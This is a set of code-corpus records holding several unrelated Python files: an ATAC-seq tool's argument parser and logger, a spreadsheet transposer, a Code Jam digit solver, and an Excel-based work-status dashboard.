\"--IDs\", type=str, default='infer',\n help=\"Input ID. The ID is in agreement with the input file by order and number. You can use comma, semicolon or at to split multiple files\")\n P_mgpeak.add_argument(\"-mp\", \"--mergepara\", type=str, default='',\n help=\"the bedtools merge parameters.\")\n P_mgpeak.add_argument(\"-ps\", \"--peaksoft\", type=str, default='macs2', choices=['macs','genrich'],\n help=\"the software of call peaks, sucn as macs, genrich.\")\n P_mgpeak.add_argument(\"-pt\", \"--peaktype\", type=str, default='narrow', choices=['narrow','broad'],\n help=\"the type of call peaks, sucn as narrow, broad.\")\n P_Mgpeak = subparsers.add_parser('mergepeak',conflict_handler='resolve',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n parents=[P_Common,P_mgpeak],\n help='merge peaks.')\n\n P_Autopipe = subparsers.add_parser('Auto', conflict_handler='resolve', prefix_chars='-+',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n parents=[P_Common, P_mgpeak],\n help='the auto-processing for all.')\n P_Autopipe.add_argument(\"+P\", \"++pipeline\",nargs='+',\n help=\"the auto-processing: standardization, feature selection, Fitting and/or Prediction.\")\n P_Autopipe.add_argument('+M','++MODEL' , nargs='+', type=str, default=['Standard'],\n help='''Chose more the one models from Standard, Fselect,Fitting and Predict used for DIY pipline.''')\n args = parser.parse_args()\n return args\n\n\nimport logging\nclass DispatchingFormatter:\n def __init__(self, formatters, default_formatter):\n self._formatters = formatters\n self._default_formatter = default_formatter\n\n def format(self, record):\n formatter = self._formatters.get(record.name, self._default_formatter)\n return formatter.format(record)\n\nclass Logger:\n level_dict = {\n 'NOTSET' : logging.NOTSET,\n 'DEBUG' : logging.DEBUG,\n 'INFO' : logging.INFO,\n 'WARNING' : logging.WARNING,\n 'ERROR' : logging.ERROR,\n 'CRITICAL': logging.CRITICAL,\n }\n\n ChangeFrom = DispatchingFormatter(\n { 'c' : logging.Formatter( '[%(asctime)s] [%(levelname)-4s]: %(message)s', '%Y-%m-%d %H:%M:%S'),\n 'p' : logging.Formatter( '[%(levelname)-4s]: %(message)s'),\n 'n' : logging.Formatter( '%(message)s' ),\n }, \n logging.Formatter('%(message)s')\n )\n\n def __init__(self, outpath, filemode='w', clevel = 'INFO', Flevel = 'INFO'):\n\n logging.basicConfig(\n level = Logger.level_dict[clevel] ,\n format = '[%(asctime)s] [%(levelname)-4s]: %(message)s',\n datefmt = '%Y-%m-%d %H:%M:%S',\n filename = None,\n )\n\n File = logging.FileHandler(outpath, mode= filemode)\n File.setLevel(Logger.level_dict[Flevel])\n File.setFormatter(Logger.ChangeFrom)\n logging.getLogger().addHandler(File)\n\n self.R = logging\n self.C = logging.getLogger('c')\n self.P = logging.getLogger('p')\n self.N = logging.getLogger('n')\n self.CI = logging.getLogger('c').info\n self.NI = logging.getLogger('n').info\n self.CW = logging.getLogger('c').warning\n self.NW = logging.getLogger('n').warning\n\nimport os\nimport time\nimport traceback\ndef Commands():\n info ='''\n>^o^<\n***********************************************************\n* Author : Zhou Wei *\n* Date : %s *\n* E-mail : welljoea@gmail.com *\n* You are using The scripted by Zhou Wei. *\n* If you find some bugs, please email to me. *\n* Please let me know and acknowledge in your publication. *\n* Sincerely *\n* Best wishes! *\n***********************************************************\n'''%(time.strftime(\"%a %b %d %H:%M:%S %Y\", time.localtime()))\n\n args = Args()\n Log = Logger( '%s/%s_log.log'%(args.outdir, args.commands) )\n os.makedirs( os.path.dirname(args.outdir) , exist_ok=True)\n\n Log.NI(info.strip())\n Log.NI(\"The argument you have set as follows:\".center(59, '*'))\n for i,k in enumerate(vars(args),start=1):\n Log.NI('**%s|%-13s: %s'%(str(i).zfill(2), k, str(getattr(args, k))) )\n Log.NI(59 * '*')\n\n try:\n Pipeline(args, Log).Pipe()\n Log.CI('Success!!!')\n except Exception:\n Log.CW('Failed!!!')\n traceback.print_exc()\n finally:\n Log.CI('You can check your progress in log file.')\nCommands()","sub_path":"ATACtools2.py","file_name":"ATACtools2.py","file_ext":"py","file_size_in_byte":9241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"485471011","text":"#! python3\n\"\"\"Write a program to invert the row and column of the cells in the spreadsheet.\nFor example, the value at row 5, column 3 will be at row 3, column 5 (and vice versa).\nThis should be done for all cells in the spreadsheet.\"\"\"\n\nimport openpyxl\n\n\ndef invert_cells(xls_file):\n \"\"\"Invert rows and columns in a spreadsheet.\"\"\"\n wb1 = openpyxl.load_workbook(xls_file)\n sheet1 = wb1.active\n\n sheet_data = []\n for x in range(1, sheet1.max_row):\n rows = []\n for y in range(1, sheet1.max_column+1):\n rows.append(sheet1.cell(row=x, column=y).value)\n sheet_data.append(rows)\n\n inverted_data = [list(x) for x in zip(*sheet_data)]\n\n wb2 = openpyxl.Workbook()\n sheet2 = wb2.active\n for i in range(len(inverted_data)):\n sheet2.append(inverted_data[i])\n\n wb2.save('inverted.xlsx')\n\ndef main():\n xls_file = 'example.xlsx'\n invert_cells(xls_file)\n\nif __name__ == '__main__':\n main()\n\n\n\n\n\n\n\n\n\n","sub_path":"Chapter_12-Working_with_Excel_Spreadsheets/spreadsheet_cell_inverter.py","file_name":"spreadsheet_cell_inverter.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"233454511","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n# vim:fenc=utf-8\n#\n# Copyright © 2016 tejas \n#\n# Distributed under terms of the MIT license.\n\nres=[]\nfreq={}\nnum=[ \"ZERO\", \"ONE\", \"TWO\", \"THREE\", \"FOUR\", \"FIVE\", \"SIX\", \"SEVEN\", \"EIGHT\", \"NINE\"]\n\ndef subtract(x , index):\n\n while freq[x] > 0:\n res.append(index)\n for z in num[index] : freq[z]-=1\n\n\ndef main():\n testCases=int(input())\n for tc in range(testCases):\n\n global res,freq\n res[:]=[]\n freq.clear()\n\n s=input()\n for c in 'QWERTYUIOPASDFGHJKLZXCVBNM':\n freq[c]=0\n for c in s : \n freq[c]+=1\n \n subtract('Z',0)\n subtract('W',2)\n subtract('U',4)\n subtract('X',6)\n subtract('G',8)\n\n subtract('O',1)\n subtract('H',3)\n subtract('F',5)\n\n\n subtract('S',7)\n subtract('I',9)\n\n res.sort()\n print (\"Case #{}: \".format(tc+1),end='')\n for i in res:\n print (i,end='')\n print()\n\n\nmain()\n\n","sub_path":"codes/CodeJamCrawler/16_2_1/tejaspandey/digits.py","file_name":"digits.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"147039522","text":"file_r = open(\"types.txt\", \"rw+\")\nfile_w = open('typeList','w')\n\nresult = \"\"\n\nfor line in file_r:\n result += \"\\n\"\n\nfile_w.write(result)\n\nfile_r.close()\nfile_r.close()\n","sub_path":"js/placeTypes.py","file_name":"placeTypes.py","file_ext":"py","file_size_in_byte":211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"129479409","text":"import os\nimport xlrd\nfrom datetime import datetime\nbase_path = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\ntracker_path=os.path.join(base_path,'templates','MasterTracker')\n\n# m_tracker=pd.ExcelFile(tracker_path+\"\\\\Master_Tracker_v8.6.xlsx\")\n# desg=pd.read_excel(tracker_path+\"\\\\Master_Tracker_v8.6.xlsx\",sheetname=\"DESG T18 Allocation\")\n#\nmaster_tracker=xlrd.open_workbook(tracker_path+\"\\\\Master_Tracker_v8.6.xlsx\")\n\npdc=master_tracker.sheet_by_name(\"DESG PDC Allocation\")\ndesg=master_tracker.sheet_by_name(\"DESG T18 Allocation\")\nldm=master_tracker.sheet_by_name(\"LDM Allocation\")\ndsg_iab=master_tracker.sheet_by_name(\"DSG - IAB Allocation\")\nndq_iab=master_tracker.sheet_by_name(\"NDQ - IAB Allocation\")\ndsg_fab=master_tracker.sheet_by_name(\"DSG - FAB Allocation\")\nndq_fab=master_tracker.sheet_by_name(\"NDQ - FAB Allocation\")\ntransit=master_tracker.sheet_by_name(\"Transit Allocation\")\n\ntoday=datetime.now().month\n\n#1st month\none_pc_in_queue=[]\none_pc_inprogress=[]\none_pc_on_hold=[]\none_pc_completed=[]\none_pc_rejected=[]\none_gml_in_queue=[]\none_gml_inprogress=[]\none_gml_on_hold=[]\none_gml_completed=[]\none_gml_rejected=[]\n\n#2nd month\ntwo_pc_in_queue=[]\ntwo_pc_inprogress=[]\ntwo_pc_on_hold=[]\ntwo_pc_completed=[]\ntwo_pc_rejected=[]\ntwo_gml_in_queue=[]\ntwo_gml_inprogress=[]\ntwo_gml_on_hold=[]\ntwo_gml_completed=[]\ntwo_gml_rejected=[]\n\n#PDC\npdc_inprogress_status=[\"In Progress - PDC\",\"In Progress - AFR Load\",\"QA Completed - Ready for submission\",\"In Progress-Delta\",\"Delta completed-Ready for submission\",]\npdc_queue_status=[\"In Queue - To be Assigned\",]\npdc_completed_status=[\"PDC completed & AFR Submitted\",\"AFR Load Completed & Posted\",\"Delta completed & AFR submitted\",]\npdc_on_hold_status=[\"On Hold\",]\npdc_rejected_status=[\"Rejected\",]\n# # PC Status\n# pc_inprogress_status=[\"In Progress - [PC] Perform Validation of T18\",\"In Progress - [PC] Load PNI\",]\n# pc_queue_status=[\"In Queue - [PC] To be Assigned\",]\n# pc_completed_status=[\"Completed [PC] - Trigger Triage\",\"Completed - [PC] GDSS Notification\",\"On Hold - Paused in Triage\",]\n# pc_on_hold_status=[\"On Hold - Awaiting Address File\",\"On Hold - [PC] Data Issues\",\"On Hold - [PC] NDD not available\",\"On Hold - [PC] Awaiting Boundary Update\",\"On Hold - [PC] Issues - NBN Internal\",\"On Hold - [PC] GDSS/PNI Issue\",]\n# pc_rejected_status=[\"Rejected - [PC] Sent Back to Telstra (DESG)\",\"Rejected - [PC] Sent Back to Telstra (LDM)\",\"Rejected - [PC] Sent Back to Telstra (AP)\",\"Rejected - [PC] Sent Back to Telstra (Design/NA)\"]\n# # GML Status\n# gml_queue_status=[\"In Queue - [GML] To be Assigned\",]\n# gml_inprogress_status=[\"In Progress - [GML] PNI Load - Complete Run\",\"In Progress - [GML] Generate Trace Report\",]\n# gml_on_hold_status=[\"On Hold - [GML] Issues - NBN Internal\",\"On Hold - [GML] PNI Issue\",\"On Hold - [GML] Awaiting Boundary Update\",]\n# gml_rejected_status=[\"Rejected - [GML] Sent Back to Telstra (DESG)\",]\n# gml_completed_status=[\"Completed - [GML] Handover to DSG\",]\n# #LDM Status\n# ldm_inprogress_status=[\"In Progress - LocID Matching\",\"In Progress - LocID Matching Completed\",\"In Progress - Repurposing\",\"In Progress - Repurposing Completed\",\"In Progress - Address Alignment\",\"In Progress - Address Alignment Completed\",\"In Progress - Final Validations\",]\n# ldm_queue_status=[\"In Queue - To be Assigned\",]\n# ldm_completed_status=[\"Completed - Handover done\",]\n# ldm_on_hold_status=[\"On Hold\",]\n# ldm_rejected_status=[\"Rejected\",]\n#IAB DSG\ndsg_iab_inprogress_status=[\"In Progress\",\"In Progress - HFC Completed\",]\ndsg_iab_queue_status=[\"In Queue - To be Assigned\",\"In Queue - HFC Completed\",]\ndsg_iab_completed_status=[\"Completed\",]\ndsg_iab_on_hold_status=[\"On Hold - HFC Completed\",\"On Hold - PNI Issues\",\"On Hold - Data Issues\",\"On Hold - Document Unavailability\",\"On Hold - Awaiting Upstream team Updates\",\"On Hold - PNI Issues\",\"On Hold - Data Issues\",\"On Hold - Document Unavailability\",\"On Hold - Awaiting Upstream team Updates\",]\ndsg_iab_rejected_status=[\"Rejected\",]\n#IAB NDQ\nndq_iab_inprogress_status=[\"In Progress\",]\nndq_iab_queue_status=[\"In Queue - To be Assigned (QI)\",\"In Queue - To be Assigned (Defect Resolution)\",]\nndq_iab_completed_status=[\"Completed\",\"Completed - Handed over to NEO\",]\nndq_iab_on_hold_status=[\"On Hold\",]\nndq_iab_rejected_status=[\"Rejected\",]\n#FAB DSG\ndsg_fab_inprogress_status=[\"In Progress\",]\ndsg_fab_queue_status=[\"In Queue - To be Assigned\",\"In Queue - Awaiting T18 Lite\",]\ndsg_fab_completed_status=[\"Completed\",]\ndsg_fab_on_hold_status=[\"On Hold\",]\ndsg_fab_rejected_status=[\"Rejected\",]\n#FAB NDQ\nndq_fab_inprogress_status=[\"In Progress\",]\nndq_fab_queue_status=[\"In Queue - To be Assigned (QI)\",\"In Queue - To be Assigned (Defect Resolution)\",]\nndq_fab_completed_status=[\"Completed - Handed over to NEO\",\"Completed - Awaiting final Acceptance\",\"Completed - Accepted by NEO\",]\nndq_fab_on_hold_status=[\"On Hold\",]\nndq_fab_rejected_status=[\"Rejected\",]\n#Transit\npc_inprogress_status=[\"In Progress - PNI Load\",\"In Progress - Asset Remediation\",\"In Progress - Defect Fix\",]\npc_queue_status=[\"In Queue - To be Assigned (PNI Load)\",\"In Queue - To be Assigned (Defects)\",]\npc_completed_status=[\"Completed - Handed over to NDQ\",\"Completed - Defects fixed & notified NDQ\",\"Completed - Final Acceptance Received\",]\n\ndef desg_report():\n\tone_pc_count=two_pc_count=third_pc_count=one_gml_count=two_gml_count=third_gml_count=[]\n\tfor i in range(desg.nrows):\n\t\tinput_date=desg.cell(i,7).value\n\t\tst=desg.cell(i,6).value\n\t\tstatus=st.strip()\n\t\tsam_name=desg.cell(i,0).value\n\t\tif type(input_date) == float:\n\t\t\tdate=xlrd.xldate_as_tuple(desg.cell(i,7).value,master_tracker.datemode)\n\t\t\tdate=datetime(*date[0:6])\n\t\t\tdiff=today-date\n\t\t\tif diff.days>=9:\n\t\t\t\tif \"Queue\" in status and \"PC\" in status:\n\t\t\t\t\tone_pc_in_queue.append(sam_name)\n\t\t\t\telif \"In Progress\" in status and \"PC\" in status:\n\t\t\t\t\tone_pc_inprogress.append(sam_name)\n\t\t\t\telif \"On Hold\" in status and \"PC\" in status:\n\t\t\t\t\tone_pc_on_hold.append(sam_name)\n\t\t\t\telif \"Rejected\" in status and \"PC\" in status:\n\t\t\t\t\tone_pc_rejected.append(sam_name)\n\t\t\t\telif \"Completed\" in status and \"PC\" in status:\n\t\t\t\t\tone_pc_completed.append(sam_name)\n\t\t\t\telif \"Queue\" in status and \"GML\" in status:\n\t\t\t\t\tone_gml_in_queue.append(sam_name)\n\t\t\t\telif \"In Progress\" in status and \"GML\" in status:\n\t\t\t\t\tone_gml_inprogress.append(sam_name)\n\t\t\t\telif \"On Hold\" in status and \"GML\" in status:\n\t\t\t\t\tone_gml_on_hold.append(sam_name)\n\t\t\t\telif \"Rejected\" in status and \"GML\" in status:\n\t\t\t\t\tone_gml_rejected.append(sam_name)\n\t\t\t\telif \"Completed\" in status and \"GML\" in status:\n\t\t\t\t\tone_gml_completed.append(sam_name)\n\n\n\t\t\tif diff.days>=30:\n\t\t\t\tif \"Queue\" in status and \"PC\" in status:\n\t\t\t\t\ttwo_pc_in_queue.append(sam_name)\n\t\t\t\telif \"In Progress\" in status and \"PC\" in status:\n\t\t\t\t\ttwo_pc_inprogress.append(sam_name)\n\t\t\t\telif \"On Hold\" in status and \"PC\" in status:\n\t\t\t\t\ttwo_pc_on_hold.append(sam_name)\n\t\t\t\telif \"Rejected\" in status and \"PC\" in status:\n\t\t\t\t\ttwo_pc_rejected.append(sam_name)\n\t\t\t\telif \"Completed\" in status and \"PC\" in status:\n\t\t\t\t\ttwo_pc_completed.append(sam_name)\n\t\t\t\telif \"Queue\" in status and \"GML\" in status:\n\t\t\t\t\ttwo_gml_in_queue.append(sam_name)\n\t\t\t\telif \"In Progress\" in status and \"GML\" in status:\n\t\t\t\t\ttwo_gml_inprogress.append(sam_name)\n\t\t\t\telif \"On Hold\" in status and \"GML\" in status:\n\t\t\t\t\ttwo_gml_on_hold.append(sam_name)\n\t\t\t\telif \"Rejected\" in status and \"GML\" in status:\n\t\t\t\t\ttwo_gml_rejected.append(sam_name)\n\t\t\t\telif \"Completed\" in status and \"GML\" in status:\n\t\t\t\t\ttwo_gml_completed.append(sam_name)\n\n\t\t\n\t\t\t\n\n\tone_pc_count=[len(one_pc_in_queue),len(one_pc_inprogress),len(one_pc_completed),len(one_pc_on_hold),len(one_pc_rejected)]\n\ttwo_pc_count=[len(two_pc_in_queue),len(two_pc_inprogress),len(two_pc_completed),len(two_pc_on_hold),len(two_pc_rejected)]\n\tone_gml_count=[len(one_gml_in_queue),len(one_gml_inprogress),len(one_gml_completed),len(one_gml_on_hold),len(one_gml_rejected)]\n\ttwo_gml_count=[len(two_gml_in_queue),len(two_gml_inprogress),len(two_gml_completed),len(two_gml_on_hold),len(two_gml_rejected)]\n\n\treturn [one_pc_count,two_pc_count],[one_gml_count,two_gml_count]\n\n\n#LDM Report\nldm_input_date=[]\n\n#1st month\none_ldm_in_queue=[]\none_ldm_inprogress=[]\none_ldm_on_hold=[]\none_ldm_completed=[]\none_ldm_rejected=[]\n\n#2nd month\ntwo_ldm_in_queue=[]\ntwo_ldm_inprogress=[]\ntwo_ldm_on_hold=[]\ntwo_ldm_completed=[]\ntwo_ldm_rejected=[]\n\n#3rd month\nthird_ldm_in_queue=[]\nthird_ldm_inprogress=[]\nthird_ldm_on_hold=[]\nthird_ldm_completed=[]\nthird_ldm_rejected=[]\n\n# ldm_inprogress_status=[\"In Progress - LocID Matching\",\"In Progress - LocID Matching Completed\",\"In Progress - Repurposing\",\"In Progress - Repurposing Completed\",\"In Progress - Address Alignment\",\"In Progress - Address Alignment Completed\",\"In Progress - Final Validations\",]\n# ldm_queue_status=[\"In Queue - To be Assigned\",]\n# ldm_completed_status=[\"Completed - Handover done\",]\n# ldm_on_hold_status=[\"On Hold\",]\n# ldm_rejected_status=[\"Rejected\",]\n\ndef ldm_report():\n\tfor i in range(ldm.nrows):\n\t\tinput_date=ldm.cell(i,8).value\n\t\tstatus=ldm.cell(i,6).value\n\t\tsam_name=ldm.cell(i,0).value\n\t\tif type(input_date) == float:\n\t\t\tdate=xlrd.xldate_as_tuple(ldm.cell(i,8).value,master_tracker.datemode)\n\t\t\ttoday=datetime.now().month\n\t\t\tif today==date[1]:\n\t\t\t\tif \"In Queue\" in status:\n\t\t\t\t\tone_ldm_in_queue.append(sam_name)\n\t\t\t\telif \"In Progress\" in status:\n\t\t\t\t\tone_ldm_inprogress.append(sam_name)\n\t\t\t\telif \"On Hold\" in status:\n\t\t\t\t\tone_ldm_on_hold.append(sam_name)\n\t\t\t\telif \"Rejected\" in status:\n\t\t\t\t\tone_ldm_rejected.append(sam_name)\n\t\t\t\telif \"Handover done\" in status:\n\t\t\t\t\tone_ldm_completed.append(sam_name)\n\n\n\t\t\tif today==1:\n\t\t\t\tif date[1]==12:\n\t\t\t\t\tif \"In Queue\" in status:\n\t\t\t\t\t\ttwo_ldm_in_queue.append(sam_name)\n\t\t\t\t\telif \"In Progress\" in status:\n\t\t\t\t\t\ttwo_ldm_inprogress.append(sam_name)\n\t\t\t\t\telif \"On Hold\" in status:\n\t\t\t\t\t\ttwo_ldm_on_hold.append(sam_name)\n\t\t\t\t\telif \"Rejected\" in status:\n\t\t\t\t\t\ttwo_ldm_rejected.append(sam_name)\n\t\t\t\t\telif \"Handover done\" in status:\n\t\t\t\t\t\ttwo_ldm_completed.append(sam_name)\n\n\t\t\t\tif date[1]==11:\n\t\t\t\t\tif \"In Queue\" in status:\n\t\t\t\t\t\tthird_ldm_in_queue.append(sam_name)\n\t\t\t\t\telif \"In Progress\" in status:\n\t\t\t\t\t\tthird_ldm_inprogress.append(sam_name)\n\t\t\t\t\telif \"On Hold\" in status:\n\t\t\t\t\t\tthird_ldm_on_hold.append(sam_name)\n\t\t\t\t\telif \"Rejected\" in status:\n\t\t\t\t\t\tthird_ldm_rejected.append(sam_name)\n\t\t\t\t\telif \"Handover done\" in status:\n\t\t\t\t\t\tthird_ldm_completed.append(sam_name)\n\n\t\t\telif today==2:\n\t\t\t\tif date[1]==1:\n\t\t\t\t\tif \"In Queue\" in status:\n\t\t\t\t\t\ttwo_ldm_in_queue.append(sam_name)\n\t\t\t\t\telif \"In Progress\" in status:\n\t\t\t\t\t\ttwo_ldm_inprogress.append(sam_name)\n\t\t\t\t\telif \"On Hold\" in status:\n\t\t\t\t\t\ttwo_ldm_on_hold.append(sam_name)\n\t\t\t\t\telif \"Rejected\" in status:\n\t\t\t\t\t\ttwo_ldm_rejected.append(sam_name)\n\t\t\t\t\telif \"Handover done\" in status:\n\t\t\t\t\t\ttwo_ldm_completed.append(sam_name)\n\n\t\t\t\tif date[1]==12:\n\t\t\t\t\tif \"In Queue\" in status:\n\t\t\t\t\t\tthird_ldm_in_queue.append(sam_name)\n\t\t\t\t\telif \"In Progress\" in status:\n\t\t\t\t\t\tthird_ldm_inprogress.append(sam_name)\n\t\t\t\t\telif \"On Hold\" in status:\n\t\t\t\t\t\tthird_ldm_on_hold.append(sam_name)\n\t\t\t\t\telif \"Rejected\" in status:\n\t\t\t\t\t\tthird_ldm_rejected.append(sam_name)\n\t\t\t\t\telif \"Handover done\" in status:\n\t\t\t\t\t\tthird_ldm_completed.append(sam_name)\n\n\t\t\telse:\n\t\t\t\tif date[1]==(date[1]-1):\n\t\t\t\t\tif \"In Queue\" in status:\n\t\t\t\t\t\ttwo_ldm_in_queue.append(sam_name)\n\t\t\t\t\telif \"In Progress\" in status:\n\t\t\t\t\t\ttwo_ldm_inprogress.append(sam_name)\n\t\t\t\t\telif \"On Hold\" in status:\n\t\t\t\t\t\ttwo_ldm_on_hold.append(sam_name)\n\t\t\t\t\telif \"Rejected\" in status:\n\t\t\t\t\t\ttwo_ldm_rejected.append(sam_name)\n\t\t\t\t\telif \"Handover done\" in status:\n\t\t\t\t\t\ttwo_ldm_completed.append(sam_name)\n\t\t\t\tif date[1]==(date[1]-2):\n\t\t\t\t\tif \"In Queue\" in status:\n\t\t\t\t\t\tthird_ldm_in_queue.append(sam_name)\n\t\t\t\t\telif \"In Progress\" in status:\n\t\t\t\t\t\tthird_ldm_inprogress.append(sam_name)\n\t\t\t\t\telif \"On Hold\" in status:\n\t\t\t\t\t\tthird_ldm_on_hold.append(sam_name)\n\t\t\t\t\telif \"Rejected\" in status:\n\t\t\t\t\t\tthird_ldm_rejected.append(sam_name)\n\t\t\t\t\telif \"Handover done\" in status:\n\t\t\t\t\t\tthird_ldm_completed.append(sam_name)\n\n\tone_ldm_count=[len(one_ldm_in_queue),len(one_ldm_inprogress),len(one_ldm_completed),len(one_ldm_on_hold),len(one_ldm_rejected)]\n\ttwo_ldm_count=[len(two_ldm_in_queue),len(two_ldm_inprogress),len(two_ldm_completed),len(two_ldm_on_hold),len(two_ldm_rejected)]\n\tthird_ldm_count=[len(third_ldm_in_queue),len(third_ldm_inprogress),len(third_ldm_completed),len(third_ldm_on_hold),len(third_ldm_rejected)]\n\treturn [one_ldm_count,two_ldm_count,third_ldm_count]\n\n#DSG IAB Report\n\n\n#1st month\none_dsg_iab_in_queue=[]\none_dsg_iab_inprogress=[]\none_dsg_iab_on_hold=[]\none_dsg_iab_completed=[]\none_dsg_iab_rejected=[]\n\n#2nd month\ntwo_dsg_iab_in_queue=[]\ntwo_dsg_iab_inprogress=[]\ntwo_dsg_iab_on_hold=[]\ntwo_dsg_iab_completed=[]\ntwo_dsg_iab_rejected=[]\n\n#3rd month\nthird_dsg_iab_in_queue=[]\nthird_dsg_iab_inprogress=[]\nthird_dsg_iab_on_hold=[]\nthird_dsg_iab_completed=[]\nthird_dsg_iab_rejected=[]\ndsg_iab_inprogress_status=[\"In Progress\",\"In Progress - HFC Completed\",]\ndsg_iab_queue_status=[\"In Queue - To be Assigned\",\"In Queue - HFC Completed\",]\ndsg_iab_completed_status=[\"Completed\",]\ndsg_iab_on_hold_status=[\"On Hold - HFC Completed\",\"On Hold - PNI Issues\",\"On Hold - Data Issues\",\"On Hold - Document Unavailability\",\"On Hold - Awaiting Upstream team Updates\",\"On Hold - PNI Issues\",\"On Hold - Data Issues\",\"On Hold - Document Unavailability\",\"On Hold - Awaiting Upstream team Updates\",]\ndsg_iab_rejected_status=[\"Rejected\",]\ndef dsg_iab_report():\n\tfor i in range(dsg_iab.nrows):\n\t\tinput_date=dsg_iab.cell(i,8).value\n\t\tstatus=dsg_iab.cell(i,6).value\n\t\tsam_name=dsg_iab.cell(i,0).value\n\t\tif type(input_date) == float:\n\t\t\tdate=xlrd.xldate_as_tuple(dsg_iab.cell(i,8).value,master_tracker.datemode)\n\t\t\ttoday=datetime.now().month\n\t\t\tif today==date[1]:\n\t\t\t\tif \"In Queue\" in status:\n\t\t\t\t\tone_dsg_iab_in_queue.append(sam_name)\n\t\t\t\telif \"In Progress\" in status:\n\t\t\t\t\tone_dsg_iab_inprogress.append(sam_name)\n\t\t\t\telif \"On Hold\" in status:\n\t\t\t\t\tone_dsg_iab_on_hold.append(sam_name)\n\t\t\t\telif \"Rejected\" in status:\n\t\t\t\t\tone_dsg_iab_rejected.append(sam_name)\n\t\t\t\telif \"Completed\" in status:\n\t\t\t\t\tone_dsg_iab_completed.append(sam_name)\n\t\t\tif today==1:\n\t\t\t\tif date[1]==12:\n\t\t\t\t\tif \"In Queue\" in status:\n\t\t\t\t\t\ttwo_dsg_iab_in_queue.append(sam_name)\n\t\t\t\t\telif \"In Progress\" in status:\n\t\t\t\t\t\ttwo_dsg_iab_inprogress.append(sam_name)\n\t\t\t\t\telif \"On Hold\" in status:\n\t\t\t\t\t\ttwo_dsg_iab_on_hold.append(sam_name)\n\t\t\t\t\telif \"Rejected\" in status:\n\t\t\t\t\t\ttwo_dsg_iab_rejected.append(sam_name)\n\t\t\t\t\telif \"Completed\" in status:\n\t\t\t\t\t\ttwo_dsg_iab_completed.append(sam_name)\n\n\t\t\t\tif date[1]==11:\n\t\t\t\t\tif \"In Queue\" in status:\n\t\t\t\t\t\tthird_dsg_iab_in_queue.append(sam_name)\n\t\t\t\t\telif \"In Progress\" in status:\n\t\t\t\t\t\tthird_dsg_iab_inprogress.append(sam_name)\n\t\t\t\t\telif \"On Hold\" in status:\n\t\t\t\t\t\tthird_dsg_iab_on_hold.append(sam_name)\n\t\t\t\t\telif \"Rejected\" in status:\n\t\t\t\t\t\tthird_dsg_iab_rejected.append(sam_name)\n\t\t\t\t\telif \"Completed\" in status:\n\t\t\t\t\t\tthird_dsg_iab_completed.append(sam_name)\n\n\n\t\t\telif today==2:\n\t\t\t\tif date[1]==1:\n\t\t\t\t\tif \"In Queue\" in status:\n\t\t\t\t\t\ttwo_dsg_iab_in_queue.append(sam_name)\n\t\t\t\t\telif \"In Progress\" in status:\n\t\t\t\t\t\ttwo_dsg_iab_inprogress.append(sam_name)\n\t\t\t\t\telif \"On Hold\" in status:\n\t\t\t\t\t\ttwo_dsg_iab_on_hold.append(sam_name)\n\t\t\t\t\telif \"Rejected\" in status:\n\t\t\t\t\t\ttwo_dsg_iab_rejected.append(sam_name)\n\t\t\t\t\telif \"Completed\" in status:\n\t\t\t\t\t\ttwo_dsg_iab_completed.append(sam_name)\n\n\t\t\t\tif date[1]==12:\n\t\t\t\t\tif \"In Queue\" in status:\n\t\t\t\t\t\tthird_dsg_iab_in_queue.append(sam_name)\n\t\t\t\t\telif \"In Progress\" in status:\n\t\t\t\t\t\tthird_dsg_iab_inprogress.append(sam_name)\n\t\t\t\t\telif \"On Hold\" in status:\n\t\t\t\t\t\tthird_dsg_iab_on_hold.append(sam_name)\n\t\t\t\t\telif \"Rejected\" in status:\n\t\t\t\t\t\tthird_dsg_iab_rejected.append(sam_name)\n\t\t\t\t\telif \"Completed\" in status:\n\t\t\t\t\t\tthird_dsg_iab_completed.append(sam_name)\n\n\t\t\telse:\n\t\t\t\tif date[1]==(date[1]-1):\n\t\t\t\t\tif \"In Queue\" in status:\n\t\t\t\t\t\ttwo_dsg_iab_in_queue.append(sam_name)\n\t\t\t\t\telif \"In Progress\" in status:\n\t\t\t\t\t\ttwo_dsg_iab_inprogress.append(sam_name)\n\t\t\t\t\telif \"On Hold\" in status:\n\t\t\t\t\t\ttwo_dsg_iab_on_hold.append(sam_name)\n\t\t\t\t\telif \"Rejected\" in status:\n\t\t\t\t\t\ttwo_dsg_iab_rejected.append(sam_name)\n\t\t\t\t\telif \"Completed\" in status:\n\t\t\t\t\t\ttwo_dsg_iab_completed.append(sam_name)\n\n\t\t\t\tif date[1]==(date[1]-2):\n\t\t\t\t\tif \"In Queue\" in status:\n\t\t\t\t\t\tthird_dsg_iab_in_queue.append(sam_name)\n\t\t\t\t\telif \"In Progress\" in status:\n\t\t\t\t\t\tthird_dsg_iab_inprogress.append(sam_name)\n\t\t\t\t\telif \"On Hold\" in status:\n\t\t\t\t\t\tthird_dsg_iab_on_hold.append(sam_name)\n\t\t\t\t\telif \"Rejected\" in status:\n\t\t\t\t\t\tthird_dsg_iab_rejected.append(sam_name)\n\t\t\t\t\telif \"Completed\" in status:\n\t\t\t\t\t\tthird_dsg_iab_completed.append(sam_name)\n\n\treturn []\n","sub_path":"hda_forum/desg_t18/dashboard.py","file_name":"dashboard.py","file_ext":"py","file_size_in_byte":16590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
